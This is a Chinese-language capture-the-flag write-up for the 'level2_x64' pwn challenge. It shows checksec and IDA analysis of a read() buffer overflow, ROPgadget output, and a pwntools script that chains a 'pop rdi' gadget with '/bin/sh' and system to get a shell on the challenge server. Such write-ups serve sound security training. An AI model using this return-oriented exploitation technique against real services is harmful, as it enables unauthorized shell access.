分析

  • checksec
1
2
3
➜  pwn checksec --file=level2_x64    
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH	Symbols		FORTIFY	Fortified	Fortifiable	FILE
No RELRO        No canary found   NX enabled    No PIE          No RPATH   No RUNPATH   68) Symbols	  No	0		1	level2_x64
  1. ida
1
2
3
4
5
int __cdecl main(int argc, const char **argv, const char **envp)
{
  vulnerable_function();
  return system("echo 'Hello World!'");
}

vulnerable_function函数:

1
2
3
4
5
6
7
ssize_t vulnerable_function()
{
  char buf[128]; // [rsp+0h] [rbp-80h] BYREF

  system("echo Input:");
  return read(0, buf, 0x200uLL);
}

read存在溢出,查看buf:

1
-0000000000000080 ; D/A/*   : change type (data/ascii/array)
  • 长度0x80

查看string:

  • system:0x040063E

    • 注意这里不是string地址,而是system函数调用地址

  • /bin/sh:0x0600A90

一眼就是ROP利用

利用

  • pop | ret
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
➜  pwn ROPgadget --binary level2_x64 --only 'pop|ret'
Gadgets information
============================================================
0x00000000004006ac : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004006ae : pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004006b0 : pop r14 ; pop r15 ; ret
0x00000000004006b2 : pop r15 ; ret
0x00000000004006ab : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004006af : pop rbp ; pop r14 ; pop r15 ; ret
0x0000000000400560 : pop rbp ; ret
0x00000000004006b3 : pop rdi ; ret
0x00000000004006b1 : pop rsi ; pop r15 ; ret
0x00000000004006ad : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004004a1 : ret
Unique gadgets found: 11
  • 0x00000000004004a1 : ret
  • 0x00000000004006b3 : pop rdi ; ret
1
2
pwndbg> info address main
Symbol "main" is at 0x400620 in a file compiled without debugging.

  • 0x400620 main

  • 代码

1
2
3
4
5
6
7
8
from pwn import *
r = remote('node5.buuoj.cn',29141)
systemaddr = 0x040063E
shelladdr = 0x0600A90
rdiaddr = 0x04006b3
buf = b'a' * (0x80+8) + p64(rdiaddr) + p64(shelladdr) + p64(systemaddr)
r.sendline(buf)
r.interactive()